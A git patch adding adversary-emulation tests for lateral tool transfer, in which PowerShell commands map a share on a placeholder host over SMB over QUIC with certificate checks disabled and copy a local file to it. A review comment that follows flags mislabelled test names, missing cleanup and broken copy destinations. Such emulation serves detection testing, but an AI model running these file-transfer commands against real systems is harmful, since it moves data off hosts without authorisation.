From d01ecdbd4b5abec8174628b29b53ce7e2b350da7 Mon Sep 17 00:00:00 2001
From: Michael Haag <5632822+MHaggis@users.noreply.github.com>
Date: Tue, 11 Jul 2023 20:59:08 -0600
Subject: [PATCH] Create T1570.yaml (#2476)
Co-authored-by: Carrie Roberts
---
 atomics/T1570/T1570.yaml | 51 ++++++++++++++++++++++++++++++++++++++++
 1 file changed, 51 insertions(+)
 create mode 100644 atomics/T1570/T1570.yaml
diff --git a/atomics/T1570/T1570.yaml b/atomics/T1570/T1570.yaml
new file mode 100644
index 00000000..88af5696
--- /dev/null
+++ b/atomics/T1570/T1570.yaml 
@@ -0,0 +1,51 @@
+attack_technique: T1570
+display_name: 'Lateral Tool Transfer'
+atomic_tests:
+- name: Exfiltration Over SMB over QUIC (New-SmbMapping)
+ description: |
+ Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
+ Prerequisites:
+ - A file server running Windows Server 2022 Datacenter: Azure Edition
+ - A Windows 11 computer
+ - Windows Admin Center
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_path:
+ description: The UNC path to the share on the file server
+ type: string
+ default: '\\example.com\sales'
+ local_file:
+ description: The local file to be transferred
+ type: path
+ default: 'C:\path\to\file.txt'
+ executor:
+ command: |
+ New-SmbMapping -RemotePath '#{remote_path}' -TransportType QUIC -SkipCertificateCheck
+ copy '#{local_file}' 'Z:\'
+ name: powershell
+ elevation_required: true
+- name: Exfiltration Over SMB over QUIC (NET USE)
+ description: |
+ Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
+ Prerequisites:
+ - A file server running Windows Server 2022 Datacenter: Azure Edition
+ - A Windows 11 computer
+ - Windows Admin Center
+ supported_platforms:
+ - windows
+ input_arguments:
+ remote_path:
+ description: The UNC path to the share on the file server
+ type: string
+ default: '\\example.com\sales'
+ local_file:
+ description: The local file to be transferred
+ type: path
+ default: 'C:\path\to\file.txt'
+ executor:
+ command: |
+ NET USE * '#{remote_path}' /TRANSPORT:QUIC /SKIPCERTCHECK
+ copy '#{local_file}' '*:\'
+ name: powershell
+ elevation_required: true
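Review bot: Both test names and descriptions say "Exfiltration Over SMB over QUIC", but the file is T1570 Lateral Tool Transfer and each command copies a local file onto a remote share, so the names should describe a tool transfer rather than exfiltration (which is catalogued under a different technique), e.g. `- name: Lateral Tool Transfer Over SMB over QUIC (New-SmbMapping)`. Neither executor has a `cleanup_command`, so the QUIC mapping persists on the test host after the run; `cleanup_command: Remove-SmbMapping -RemotePath '#{remote_path}' -Force` for the first test and `cleanup_command: NET USE '#{remote_path}' /DELETE` for the second would tear it down. The copy destinations also look wrong: the first `New-SmbMapping` call passes no `-LocalPath`, so `copy '#{local_file}' 'Z:\'` appears to depend on Z: already being mapped, and `'*:\'` in the second test is not a usable destination once `NET USE *` has picked an arbitrary letter. Finally, the prerequisites live only in the prose description; a `dependencies:` entry with a `prereq_command` that verifies a mapping can be created with `-TransportType QUIC` would let the runner skip cleanly on hosts where QUIC transport is unsupported instead of failing mid-test.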